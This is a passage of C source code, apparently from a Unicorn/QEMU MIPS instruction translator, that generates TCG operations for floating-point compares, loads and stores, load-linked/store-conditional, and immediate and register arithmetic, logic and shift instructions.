\ case 19: \ gen_helper_r6_cmp_ ## fmt ## _ne(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ break; \ case 25: \ gen_helper_r6_cmp_ ## fmt ## _sor(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ break; \ case 26: \ gen_helper_r6_cmp_ ## fmt ## _sune(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ break; \ case 27: \ gen_helper_r6_cmp_ ## fmt ## _sne(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ break; \ default: \ abort(); \ } \ STORE; \ tcg_temp_free_i ## bits(tcg_ctx, fp0); \ tcg_temp_free_i ## bits(tcg_ctx, fp1); \ } FOP_CONDNS(d, FMT_D, 64, gen_store_fpr64(ctx, fp0, fd)) FOP_CONDNS(s, FMT_S, 32, gen_store_fpr32(ctx, fp0, fd)) #undef FOP_CONDNS #undef gen_ldcmp_fpr32 #undef gen_ldcmp_fpr64 /* load/store instructions. */ #define OP_LD_ATOMIC(insn, fname) \ static inline void op_ld_##insn(TCGContext *tcg_ctx, TCGv ret, TCGv arg1, int mem_idx, \ DisasContext *ctx) \ { \ gen_helper_1e1i(insn, ret, arg1, mem_idx); \ } OP_LD_ATOMIC(ll, ld32s); #if defined(TARGET_MIPS64) OP_LD_ATOMIC(lld, ld64); #endif #undef OP_LD_ATOMIC static void gen_base_offset_addr(DisasContext *ctx, TCGv addr, int base, int offset) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (base == 0) { tcg_gen_movi_tl(tcg_ctx, addr, offset); } else if (offset == 0) { gen_load_gpr(tcg_ctx, addr, base); } else { tcg_gen_movi_tl(tcg_ctx, addr, offset); gen_op_addr_add(ctx, addr, tcg_ctx->cpu_gpr[base], addr); } } static target_ulong pc_relative_pc(DisasContext *ctx) { target_ulong pc = ctx->base.pc_next; if (ctx->hflags & MIPS_HFLAG_BMASK) { int branch_bytes = ctx->hflags & MIPS_HFLAG_BDS16 ? 2 : 4; pc -= branch_bytes; } pc &= ~(target_ulong)3; return pc; } /* Load */ static void gen_ld(DisasContext *ctx, uint32_t opc, int rt, int base, int offset) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0, t1, t2; int mem_idx = ctx->mem_idx; if (rt == 0 && ctx->insn_flags & (INSN_LOONGSON2E | INSN_LOONGSON2F)) { /* * Loongson CPU uses a load to zero register for prefetch. * We emulate it as a NOP. On other CPU we must perform the * actual memory access. */ return; } t0 = tcg_temp_new(tcg_ctx); gen_base_offset_addr(ctx, t0, base, offset); switch (opc) { #if defined(TARGET_MIPS64) case OPC_LWU: tcg_gen_qemu_ld_tl(tcg_ctx, t0, t0, mem_idx, MO_TEUL | ctx->default_tcg_memop_mask); gen_store_gpr(tcg_ctx, t0, rt); break; case OPC_LD: tcg_gen_qemu_ld_tl(tcg_ctx, t0, t0, mem_idx, MO_TEQ | ctx->default_tcg_memop_mask); gen_store_gpr(tcg_ctx, t0, rt); break; case OPC_LLD: case R6_OPC_LLD: op_ld_lld(tcg_ctx, t0, t0, mem_idx, ctx); gen_store_gpr(tcg_ctx, t0, rt); break; case OPC_LDL: t1 = tcg_temp_new(tcg_ctx); /* * Do a byte access to possibly trigger a page * fault with the unaligned address. */ tcg_gen_qemu_ld_tl(tcg_ctx, t1, t0, mem_idx, MO_UB); tcg_gen_andi_tl(tcg_ctx, t1, t0, 7); #ifndef TARGET_WORDS_BIGENDIAN tcg_gen_xori_tl(tcg_ctx, t1, t1, 7); #endif tcg_gen_shli_tl(tcg_ctx, t1, t1, 3); tcg_gen_andi_tl(tcg_ctx, t0, t0, ~7); tcg_gen_qemu_ld_tl(tcg_ctx, t0, t0, mem_idx, MO_TEQ); tcg_gen_shl_tl(tcg_ctx, t0, t0, t1); t2 = tcg_const_tl(tcg_ctx, -1); tcg_gen_shl_tl(tcg_ctx, t2, t2, t1); gen_load_gpr(tcg_ctx, t1, rt); tcg_gen_andc_tl(tcg_ctx, t1, t1, t2); tcg_temp_free(tcg_ctx, t2); tcg_gen_or_tl(tcg_ctx, t0, t0, t1); tcg_temp_free(tcg_ctx, t1); gen_store_gpr(tcg_ctx, t0, rt); break; case OPC_LDR: t1 = tcg_temp_new(tcg_ctx); /* * Do a byte access to possibly trigger a page * fault with the unaligned address. */ tcg_gen_qemu_ld_tl(tcg_ctx, t1, t0, mem_idx, MO_UB); tcg_gen_andi_tl(tcg_ctx, t1, t0, 7); #ifdef TARGET_WORDS_BIGENDIAN tcg_gen_xori_tl(tcg_ctx, t1, t1, 7); #endif tcg_gen_shli_tl(tcg_ctx, t1, t1, 3); tcg_gen_andi_tl(tcg_ctx, t0, t0, ~7); tcg_gen_qemu_ld_tl(tcg_ctx, t0, t0, mem_idx, MO_TEQ); tcg_gen_shr_tl(tcg_ctx, t0, t0, t1); tcg_gen_xori_tl(tcg_ctx, t1, t1, 63); t2 = tcg_const_tl(tcg_ctx, 0xfffffffffffffffeull); tcg_gen_shl_tl(tcg_ctx, t2, t2, t1); gen_load_gpr(tcg_ctx, t1, rt); tcg_gen_and_tl(tcg_ctx, t1, t1, t2); tcg_temp_free(tcg_ctx, t2); tcg_gen_or_tl(tcg_ctx, t0, t0, t1); tcg_temp_free(tcg_ctx, t1); gen_store_gpr(tcg_ctx, t0, rt); break; case OPC_LDPC: t1 = tcg_const_tl(tcg_ctx, pc_relative_pc(ctx)); gen_op_addr_add(ctx, t0, t0, t1); tcg_temp_free(tcg_ctx, t1); tcg_gen_qemu_ld_tl(tcg_ctx, t0, t0, mem_idx, MO_TEQ); gen_store_gpr(tcg_ctx, t0, rt); break; #endif case OPC_LWPC: t1 = tcg_const_tl(tcg_ctx, pc_relative_pc(ctx)); gen_op_addr_add(ctx, t0, t0, t1); tcg_temp_free(tcg_ctx, t1); tcg_gen_qemu_ld_tl(tcg_ctx, t0, t0, mem_idx, MO_TESL); gen_store_gpr(tcg_ctx, t0, rt); break; case OPC_LWE: mem_idx = MIPS_HFLAG_UM; /* fall through */ case OPC_LW: tcg_gen_qemu_ld_tl(tcg_ctx, t0, t0, mem_idx, MO_TESL | ctx->default_tcg_memop_mask); gen_store_gpr(tcg_ctx, t0, rt); break; case OPC_LHE: mem_idx = MIPS_HFLAG_UM; /* fall through */ case OPC_LH: tcg_gen_qemu_ld_tl(tcg_ctx, t0, t0, mem_idx, MO_TESW | ctx->default_tcg_memop_mask); gen_store_gpr(tcg_ctx, t0, rt); break; case OPC_LHUE: mem_idx = MIPS_HFLAG_UM; /* fall through */ case OPC_LHU: tcg_gen_qemu_ld_tl(tcg_ctx, t0, t0, mem_idx, MO_TEUW | ctx->default_tcg_memop_mask); gen_store_gpr(tcg_ctx, t0, rt); break; case OPC_LBE: mem_idx = MIPS_HFLAG_UM; /* fall through */ case OPC_LB: tcg_gen_qemu_ld_tl(tcg_ctx, t0, t0, mem_idx, MO_SB); gen_store_gpr(tcg_ctx, t0, rt); break; case OPC_LBUE: mem_idx = MIPS_HFLAG_UM; /* fall through */ case OPC_LBU: tcg_gen_qemu_ld_tl(tcg_ctx, t0, t0, mem_idx, MO_UB); gen_store_gpr(tcg_ctx, t0, rt); break; case OPC_LWLE: mem_idx = MIPS_HFLAG_UM; /* fall through */ case OPC_LWL: t1 = tcg_temp_new(tcg_ctx); /* * Do a byte access to possibly trigger a page * fault with the unaligned address. */ tcg_gen_qemu_ld_tl(tcg_ctx, t1, t0, mem_idx, MO_UB); tcg_gen_andi_tl(tcg_ctx, t1, t0, 3); #ifndef TARGET_WORDS_BIGENDIAN tcg_gen_xori_tl(tcg_ctx, t1, t1, 3); #endif tcg_gen_shli_tl(tcg_ctx, t1, t1, 3); tcg_gen_andi_tl(tcg_ctx, t0, t0, ~3); tcg_gen_qemu_ld_tl(tcg_ctx, t0, t0, mem_idx, MO_TEUL); tcg_gen_shl_tl(tcg_ctx, t0, t0, t1); t2 = tcg_const_tl(tcg_ctx, -1); tcg_gen_shl_tl(tcg_ctx, t2, t2, t1); gen_load_gpr(tcg_ctx, t1, rt); tcg_gen_andc_tl(tcg_ctx, t1, t1, t2); tcg_temp_free(tcg_ctx, t2); tcg_gen_or_tl(tcg_ctx, t0, t0, t1); tcg_temp_free(tcg_ctx, t1); tcg_gen_ext32s_tl(tcg_ctx, t0, t0); gen_store_gpr(tcg_ctx, t0, rt); break; case OPC_LWRE: mem_idx = MIPS_HFLAG_UM; /* fall through */ case OPC_LWR: t1 = tcg_temp_new(tcg_ctx); /* * Do a byte access to possibly trigger a page * fault with the unaligned address. */ tcg_gen_qemu_ld_tl(tcg_ctx, t1, t0, mem_idx, MO_UB); tcg_gen_andi_tl(tcg_ctx, t1, t0, 3); #ifdef TARGET_WORDS_BIGENDIAN tcg_gen_xori_tl(tcg_ctx, t1, t1, 3); #endif tcg_gen_shli_tl(tcg_ctx, t1, t1, 3); tcg_gen_andi_tl(tcg_ctx, t0, t0, ~3); tcg_gen_qemu_ld_tl(tcg_ctx, t0, t0, mem_idx, MO_TEUL); tcg_gen_shr_tl(tcg_ctx, t0, t0, t1); tcg_gen_xori_tl(tcg_ctx, t1, t1, 31); t2 = tcg_const_tl(tcg_ctx, 0xfffffffeull); tcg_gen_shl_tl(tcg_ctx, t2, t2, t1); gen_load_gpr(tcg_ctx, t1, rt); tcg_gen_and_tl(tcg_ctx, t1, t1, t2); tcg_temp_free(tcg_ctx, t2); tcg_gen_or_tl(tcg_ctx, t0, t0, t1); tcg_temp_free(tcg_ctx, t1); tcg_gen_ext32s_tl(tcg_ctx, t0, t0); gen_store_gpr(tcg_ctx, t0, rt); break; case OPC_LLE: mem_idx = MIPS_HFLAG_UM; /* fall through */ case OPC_LL: case R6_OPC_LL: op_ld_ll(tcg_ctx, t0, t0, mem_idx, ctx); gen_store_gpr(tcg_ctx, t0, rt); break; } tcg_temp_free(tcg_ctx, t0); } static void gen_llwp(DisasContext *ctx, uint32_t base, int16_t offset, uint32_t reg1, uint32_t reg2) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv taddr = tcg_temp_new(tcg_ctx); TCGv_i64 tval = tcg_temp_new_i64(tcg_ctx); TCGv tmp1 = tcg_temp_new(tcg_ctx); TCGv tmp2 = tcg_temp_new(tcg_ctx); gen_base_offset_addr(ctx, taddr, base, offset); tcg_gen_qemu_ld64(tcg_ctx, tval, taddr, ctx->mem_idx); #ifdef TARGET_WORDS_BIGENDIAN tcg_gen_extr_i64_tl(tcg_ctx, tmp2, tmp1, tval); #else tcg_gen_extr_i64_tl(tcg_ctx, tmp1, tmp2, tval); #endif gen_store_gpr(tcg_ctx, tmp1, reg1); tcg_temp_free(tcg_ctx, tmp1); gen_store_gpr(tcg_ctx, tmp2, reg2); tcg_temp_free(tcg_ctx, tmp2); tcg_gen_st_i64(tcg_ctx, tval, tcg_ctx->cpu_env, offsetof(CPUMIPSState, llval_wp)); tcg_temp_free_i64(tcg_ctx, tval); tcg_gen_st_tl(tcg_ctx, taddr, tcg_ctx->cpu_env, offsetof(CPUMIPSState, lladdr)); tcg_temp_free(tcg_ctx, taddr); } /* Store */ static void gen_st(DisasContext *ctx, uint32_t opc, int rt, int base, int offset) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); int mem_idx = ctx->mem_idx; gen_base_offset_addr(ctx, t0, base, offset); gen_load_gpr(tcg_ctx, t1, rt); switch (opc) { #if defined(TARGET_MIPS64) case OPC_SD: tcg_gen_qemu_st_tl(tcg_ctx, t1, t0, mem_idx, MO_TEQ | ctx->default_tcg_memop_mask); break; case OPC_SDL: gen_helper_0e2i(sdl, t1, t0, mem_idx); break; case OPC_SDR: gen_helper_0e2i(sdr, t1, t0, mem_idx); break; #endif case OPC_SWE: mem_idx = MIPS_HFLAG_UM; /* fall through */ case OPC_SW: tcg_gen_qemu_st_tl(tcg_ctx, t1, t0, mem_idx, MO_TEUL | ctx->default_tcg_memop_mask); break; case OPC_SHE: mem_idx = MIPS_HFLAG_UM; /* fall through */ case OPC_SH: tcg_gen_qemu_st_tl(tcg_ctx, t1, t0, mem_idx, MO_TEUW | ctx->default_tcg_memop_mask); break; case OPC_SBE: mem_idx = MIPS_HFLAG_UM; /* fall through */ case OPC_SB: tcg_gen_qemu_st_tl(tcg_ctx, t1, t0, mem_idx, MO_8); break; case OPC_SWLE: mem_idx = MIPS_HFLAG_UM; /* fall through */ case OPC_SWL: gen_helper_0e2i(swl, t1, t0, mem_idx); break; case OPC_SWRE: mem_idx = MIPS_HFLAG_UM; /* fall through */ case OPC_SWR: gen_helper_0e2i(swr, t1, t0, mem_idx); break; } tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } /* Store conditional */ static void gen_st_cond(DisasContext *ctx, int rt, int base, int offset, MemOp tcg_mo, bool eva) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv addr, t0, val; TCGLabel *l1 = gen_new_label(tcg_ctx); TCGLabel *done = gen_new_label(tcg_ctx); t0 = tcg_temp_new(tcg_ctx); addr = tcg_temp_new(tcg_ctx); /* compare the address against that of the preceeding LL */ gen_base_offset_addr(ctx, addr, base, offset); tcg_gen_brcond_tl(tcg_ctx, TCG_COND_EQ, addr, tcg_ctx->cpu_lladdr, l1); tcg_temp_free(tcg_ctx, addr); tcg_gen_movi_tl(tcg_ctx, t0, 0); gen_store_gpr(tcg_ctx, t0, rt); tcg_gen_br(tcg_ctx, done); gen_set_label(tcg_ctx, l1); /* generate cmpxchg */ val = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, val, rt); tcg_gen_atomic_cmpxchg_tl(tcg_ctx, t0, tcg_ctx->cpu_lladdr, tcg_ctx->cpu_llval, val, eva ? MIPS_HFLAG_UM : ctx->mem_idx, tcg_mo); tcg_gen_setcond_tl(tcg_ctx, TCG_COND_EQ, t0, t0, tcg_ctx->cpu_llval); gen_store_gpr(tcg_ctx, t0, rt); tcg_temp_free(tcg_ctx, val); gen_set_label(tcg_ctx, done); tcg_temp_free(tcg_ctx, t0); } static void gen_scwp(DisasContext *ctx, uint32_t base, int16_t offset, uint32_t reg1, uint32_t reg2, bool eva) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv taddr = tcg_temp_local_new(tcg_ctx); TCGv lladdr = tcg_temp_local_new(tcg_ctx); TCGv_i64 tval = tcg_temp_new_i64(tcg_ctx); TCGv_i64 llval = tcg_temp_new_i64(tcg_ctx); TCGv_i64 val = tcg_temp_new_i64(tcg_ctx); TCGv tmp1 = tcg_temp_new(tcg_ctx); TCGv tmp2 = tcg_temp_new(tcg_ctx); TCGLabel *lab_fail = gen_new_label(tcg_ctx); TCGLabel *lab_done = gen_new_label(tcg_ctx); gen_base_offset_addr(ctx, taddr, base, offset); tcg_gen_ld_tl(tcg_ctx, lladdr, tcg_ctx->cpu_env, offsetof(CPUMIPSState, lladdr)); tcg_gen_brcond_tl(tcg_ctx, TCG_COND_NE, taddr, lladdr, lab_fail); gen_load_gpr(tcg_ctx, tmp1, reg1); gen_load_gpr(tcg_ctx, tmp2, reg2); #ifdef TARGET_WORDS_BIGENDIAN tcg_gen_concat_tl_i64(tcg_ctx, tval, tmp2, tmp1); #else tcg_gen_concat_tl_i64(tcg_ctx, tval, tmp1, tmp2); #endif tcg_gen_ld_i64(tcg_ctx, llval, tcg_ctx->cpu_env, offsetof(CPUMIPSState, llval_wp)); tcg_gen_atomic_cmpxchg_i64(tcg_ctx, val, taddr, llval, tval, eva ? MIPS_HFLAG_UM : ctx->mem_idx, MO_64); if (reg1 != 0) { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[reg1], 1); } tcg_gen_brcond_i64(tcg_ctx, TCG_COND_EQ, val, llval, lab_done); gen_set_label(tcg_ctx, lab_fail); if (reg1 != 0) { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[reg1], 0); } gen_set_label(tcg_ctx, lab_done); tcg_gen_movi_tl(tcg_ctx, lladdr, -1); tcg_gen_st_tl(tcg_ctx, lladdr, tcg_ctx->cpu_env, offsetof(CPUMIPSState, lladdr)); } /* Load and store */ static void gen_flt_ldst(DisasContext *ctx, uint32_t opc, int ft, TCGv t0) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; /* * Don't do NOP if destination is zero: we must perform the actual * memory access. */ switch (opc) { case OPC_LWC1: { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_qemu_ld_i32(tcg_ctx, fp0, t0, ctx->mem_idx, MO_TESL | ctx->default_tcg_memop_mask); gen_store_fpr32(ctx, fp0, ft); tcg_temp_free_i32(tcg_ctx, fp0); } break; case OPC_SWC1: { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, ft); tcg_gen_qemu_st_i32(tcg_ctx, fp0, t0, ctx->mem_idx, MO_TEUL | ctx->default_tcg_memop_mask); tcg_temp_free_i32(tcg_ctx, fp0); } break; case OPC_LDC1: { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); tcg_gen_qemu_ld_i64(tcg_ctx, fp0, t0, ctx->mem_idx, MO_TEQ | ctx->default_tcg_memop_mask); gen_store_fpr64(ctx, fp0, ft); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_SDC1: { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, ft); tcg_gen_qemu_st_i64(tcg_ctx, fp0, t0, ctx->mem_idx, MO_TEQ | ctx->default_tcg_memop_mask); tcg_temp_free_i64(tcg_ctx, fp0); } break; default: MIPS_INVAL("flt_ldst"); generate_exception_end(ctx, EXCP_RI); break; } } static void gen_cop1_ldst(DisasContext *ctx, uint32_t op, int rt, int rs, int16_t imm) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); if (ctx->CP0_Config1 & (1 << CP0C1_FP)) { check_cp1_enabled(ctx); switch (op) { case OPC_LDC1: case OPC_SDC1: check_insn(ctx, ISA_MIPS2); /* Fallthrough */ default: gen_base_offset_addr(ctx, t0, rs, imm); gen_flt_ldst(ctx, op, rt, t0); } } else { generate_exception_err(ctx, EXCP_CpU, 1); } tcg_temp_free(tcg_ctx, t0); } /* Arithmetic with immediate operand */ static void gen_arith_imm(DisasContext *ctx, uint32_t opc, int rt, int rs, int imm) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; target_ulong uimm = (target_long)imm; /* Sign extend to 32/64 bits */ if (rt == 0 && opc != OPC_ADDI && opc != OPC_DADDI) { /* * If no destination, treat it as a NOP. * For addi, we must generate the overflow exception when needed. */ return; } switch (opc) { case OPC_ADDI: { TCGv t0 = tcg_temp_local_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); TCGv t2 = tcg_temp_new(tcg_ctx); TCGLabel *l1 = gen_new_label(tcg_ctx); gen_load_gpr(tcg_ctx, t1, rs); tcg_gen_addi_tl(tcg_ctx, t0, t1, uimm); tcg_gen_ext32s_tl(tcg_ctx, t0, t0); tcg_gen_xori_tl(tcg_ctx, t1, t1, ~uimm); tcg_gen_xori_tl(tcg_ctx, t2, t0, uimm); tcg_gen_and_tl(tcg_ctx, t1, t1, t2); tcg_temp_free(tcg_ctx, t2); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_GE, t1, 0, l1); tcg_temp_free(tcg_ctx, t1); /* operands of same sign, result different sign */ generate_exception(ctx, EXCP_OVERFLOW); gen_set_label(tcg_ctx, l1); tcg_gen_ext32s_tl(tcg_ctx, t0, t0); gen_store_gpr(tcg_ctx, t0, rt); tcg_temp_free(tcg_ctx, t0); } break; case OPC_ADDIU: if (rs != 0) { tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], tcg_ctx->cpu_gpr[rs], uimm); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], tcg_ctx->cpu_gpr[rt]); } else { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], uimm); } break; #if defined(TARGET_MIPS64) case OPC_DADDI: { TCGv t0 = tcg_temp_local_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); TCGv t2 = tcg_temp_new(tcg_ctx); TCGLabel *l1 = gen_new_label(tcg_ctx); gen_load_gpr(tcg_ctx, t1, rs); tcg_gen_addi_tl(tcg_ctx, t0, t1, uimm); tcg_gen_xori_tl(tcg_ctx, t1, t1, ~uimm); tcg_gen_xori_tl(tcg_ctx, t2, t0, uimm); tcg_gen_and_tl(tcg_ctx, t1, t1, t2); tcg_temp_free(tcg_ctx, t2); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_GE, t1, 0, l1); tcg_temp_free(tcg_ctx, t1); /* operands of same sign, result different sign */ generate_exception(ctx, EXCP_OVERFLOW); gen_set_label(tcg_ctx, l1); gen_store_gpr(tcg_ctx, t0, rt); tcg_temp_free(tcg_ctx, t0); } break; case OPC_DADDIU: if (rs != 0) { tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], tcg_ctx->cpu_gpr[rs], uimm); } else { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], uimm); } break; #endif } } /* Logic with immediate operand */ static void gen_logic_imm(DisasContext *ctx, uint32_t opc, int rt, int rs, int16_t imm) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; target_ulong uimm; if (rt == 0) { /* If no destination, treat it as a NOP. */ return; } uimm = (uint16_t)imm; switch (opc) { case OPC_ANDI: if (likely(rs != 0)) { tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], tcg_ctx->cpu_gpr[rs], uimm); } else { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], 0); } break; case OPC_ORI: if (rs != 0) { tcg_gen_ori_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], tcg_ctx->cpu_gpr[rs], uimm); } else { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], uimm); } break; case OPC_XORI: if (likely(rs != 0)) { tcg_gen_xori_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], tcg_ctx->cpu_gpr[rs], uimm); } else { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], uimm); } break; case OPC_LUI: if (rs != 0 && (ctx->insn_flags & ISA_MIPS32R6)) { /* OPC_AUI */ tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], tcg_ctx->cpu_gpr[rs], imm << 16); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], tcg_ctx->cpu_gpr[rt]); } else { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], imm << 16); } break; default: break; } } /* Set on less than with immediate operand */ static void gen_slt_imm(DisasContext *ctx, uint32_t opc, int rt, int rs, int16_t imm) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; target_ulong uimm = (target_long)imm; /* Sign extend to 32/64 bits */ TCGv t0; if (rt == 0) { /* If no destination, treat it as a NOP. */ return; } t0 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rs); switch (opc) { case OPC_SLTI: tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_LT, tcg_ctx->cpu_gpr[rt], t0, uimm); break; case OPC_SLTIU: tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_LTU, tcg_ctx->cpu_gpr[rt], t0, uimm); break; } tcg_temp_free(tcg_ctx, t0); } /* Shifts with immediate operand */ static void gen_shift_imm(DisasContext *ctx, uint32_t opc, int rt, int rs, int16_t imm) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; target_ulong uimm = ((uint16_t)imm) & 0x1f; TCGv t0; if (rt == 0) { /* If no destination, treat it as a NOP. */ return; } t0 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rs); switch (opc) { case OPC_SLL: tcg_gen_shli_tl(tcg_ctx, t0, t0, uimm); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], t0); break; case OPC_SRA: tcg_gen_sari_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], t0, uimm); break; case OPC_SRL: if (uimm != 0) { tcg_gen_ext32u_tl(tcg_ctx, t0, t0); tcg_gen_shri_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], t0, uimm); } else { tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], t0); } break; case OPC_ROTR: if (uimm != 0) { TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, t1, t0); tcg_gen_rotri_i32(tcg_ctx, t1, t1, uimm); tcg_gen_ext_i32_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], t1); tcg_temp_free_i32(tcg_ctx, t1); } else { tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], t0); } break; #if defined(TARGET_MIPS64) case OPC_DSLL: tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], t0, uimm); break; case OPC_DSRA: tcg_gen_sari_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], t0, uimm); break; case OPC_DSRL: tcg_gen_shri_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], t0, uimm); break; case OPC_DROTR: if (uimm != 0) { tcg_gen_rotri_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], t0, uimm); } else { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], t0); } break; case OPC_DSLL32: tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], t0, uimm + 32); break; case OPC_DSRA32: tcg_gen_sari_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], t0, uimm + 32); break; case OPC_DSRL32: tcg_gen_shri_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], t0, uimm + 32); break; case OPC_DROTR32: tcg_gen_rotri_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], t0, uimm + 32); break; #endif } tcg_temp_free(tcg_ctx, t0); } /* Arithmetic */ static void gen_arith(DisasContext *ctx, uint32_t opc, int rd, int rs, int rt) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (rd == 0 && opc != OPC_ADD && opc != OPC_SUB && opc != OPC_DADD && opc != OPC_DSUB) { /* * If no destination, treat it as a NOP. * For add & sub, we must generate the overflow exception when needed. */ return; } switch (opc) { case OPC_ADD: { TCGv t0 = tcg_temp_local_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); TCGv t2 = tcg_temp_new(tcg_ctx); TCGLabel *l1 = gen_new_label(tcg_ctx); gen_load_gpr(tcg_ctx, t1, rs); gen_load_gpr(tcg_ctx, t2, rt); tcg_gen_add_tl(tcg_ctx, t0, t1, t2); tcg_gen_ext32s_tl(tcg_ctx, t0, t0); tcg_gen_xor_tl(tcg_ctx, t1, t1, t2); tcg_gen_xor_tl(tcg_ctx, t2, t0, t2); tcg_gen_andc_tl(tcg_ctx, t1, t2, t1); tcg_temp_free(tcg_ctx, t2); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_GE, t1, 0, l1); tcg_temp_free(tcg_ctx, t1); /* operands of same sign, result different sign */ generate_exception(ctx, EXCP_OVERFLOW); gen_set_label(tcg_ctx, l1); gen_store_gpr(tcg_ctx, t0, rd); tcg_temp_free(tcg_ctx, t0); } break; case OPC_ADDU: if (rs != 0 && rt != 0) { tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rs], tcg_ctx->cpu_gpr[rt]); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rd]); } else if (rs == 0 && rt != 0) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rt]); } else if (rs != 0 && rt == 0) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rs]); } else { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], 0); } break; case OPC_SUB: { TCGv t0 = tcg_temp_local_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); TCGv t2 = tcg_temp_new(tcg_ctx); TCGLabel *l1 = gen_new_label(tcg_ctx); gen_load_gpr(tcg_ctx, t1, rs); gen_load_gpr(tcg_ctx, t2, rt); tcg_gen_sub_tl(tcg_ctx, t0, t1, t2); tcg_gen_ext32s_tl(tcg_ctx, t0, t0); tcg_gen_xor_tl(tcg_ctx, t2, t1, t2); tcg_gen_xor_tl(tcg_ctx, t1, t0, t1); tcg_gen_and_tl(tcg_ctx, t1, t1, t2); tcg_temp_free(tcg_ctx, t2); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_GE, t1, 0, l1); tcg_temp_free(tcg_ctx, t1); /* * operands of different sign, first operand and the result * of different sign */ generate_exception(ctx, EXCP_OVERFLOW); gen_set_label(tcg_ctx, l1); gen_store_gpr(tcg_ctx, t0, rd); tcg_temp_free(tcg_ctx, t0); } break; case OPC_SUBU: if (rs != 0 && rt != 0) { tcg_gen_sub_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rs], tcg_ctx->cpu_gpr[rt]); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rd]); } else if (rs == 0 && rt != 0) { tcg_gen_neg_tl(tcg_ctx, 